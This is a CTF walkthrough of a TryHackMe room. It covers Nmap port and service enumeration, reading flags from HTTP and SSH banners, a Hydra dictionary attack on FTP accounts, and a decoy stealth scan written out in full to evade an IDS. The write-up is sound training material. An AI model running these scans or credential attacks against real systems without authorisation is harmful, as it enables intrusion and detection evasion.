This challenge requires the use of Nmap, telnet, and Hydra to enumerate a server and retrieve a flag from within its FTP service.
What is the highest port number open less than 10,000?
Answering this question requires us to enumerate the ports available on the target server. A simple Nmap scan will reveal our answer, however, to save some time initially, I’m going to restrict the scan to the first 10,000 ports.
Based on the output provided from the scan, port 8080 is the highest open port before 10,000.
There is an open port outside the common 1000 ports; it is above 10,000. What is it?
I need to run another scan but for the sake of brevity, I’m going to add the option -T4 to speed up the time required to run the scan all ports. This would not be recommended in a real-world penetration test because it is far more likely to set off an IDS alert.
Based on the output from this scan, the port in question is port 10021.
How many TCP ports are open?
The last scan we performed showed 6 total TCP ports open on the server.
What is the flag hidden in the HTTP server header?
In order to answer this question, we can use Telnet on HTTP’s default port, port 80, to retrieve the flag hidden in the header. To do this, I used the commands in the image below:
As you can see, in the server header, the requested flag is listed after a basic HTTP GET request.
What is the flag hidden in the SSH server header?
To answer this question, I know that I must get more information about the SSH service running on its default port, port 22. There are numerous ways I can go about finding this answer, but one method is by using an Nmap service detection scan with the -sV option. See the syntax for the command as well as its output below:
To find the flag, you need to look closely in the server header information mid-way through the text. This appears to be the correct flag to answer this question.
We have an FTP server listening on a nonstandard port. What is the version of the FTP server?
In an earlier question, we discovered that the nonstandard FTP port is 10021. Therefore, we must pass this port number in our -sV scan to get the information we are looking for.
In this picture, we can see that the current FTP version run on port 10021 is vsftpd 3.0.3. This is the answer we need.
We learned two usernames using social engineering: “eddie” and “quinn”. What is the flag hidden in one of these two account files and accessible via FTP?
Answering this question requires a bit of nuance in the Hydra command we pass to retrieve our answer. Do not forget to use port 10021 as the FTP port in the tail of the command. This tail takes a atypical format due to this non-standard FTP port in use.
Because I don’t know whose account has the accessible file yet, I ran the dictionary attack on both usernames and retrieved their passwords as depicted below:
I logged in to both user accounts with the commands in the following picture and found that the username quinn led us to a file named ftp_flag.txt which had read permission set for all access levels. Therefore I used an FTP get command to copy the file from the remote machine to my local machine.
I then quit the FTP session and ran the ls command to find my newly downloaded file in my home directory. Then I used the cat command to print the contents of the file and retrieve the flag.
Browsing to http://10.10.58.215:8080 displays a small challenge that will give you a flag once you solve it. What is the flag?
This challenge presents us with the task of passing an Nmap scan that is covert enough to evade detection by the IDS. On an actual penetration test, I would use the following command to run this scan: nmap -sS -p- -T1 -D 10.10.209.194,10.10.209.105 10.10.58.215. This scan uses a Stealth SYN scan (-sS) on all ports of the server at a stealthy speed (-T1) using 3 decoys (-D) on the target host. Therefore I have implemented multiple methods of avoiding IDS detection.
However, when I ran this scan, it was taking a very long time to complete. Of course this is because of the very small number of port scans happening at any time, thanks to our -T1 switch. Therefore, for the sake of the exercise, I used the following, much faster scan that achieved the necessary results to retrieve the flag.
And there we have it. Another TryHackMe CTF challenge complete!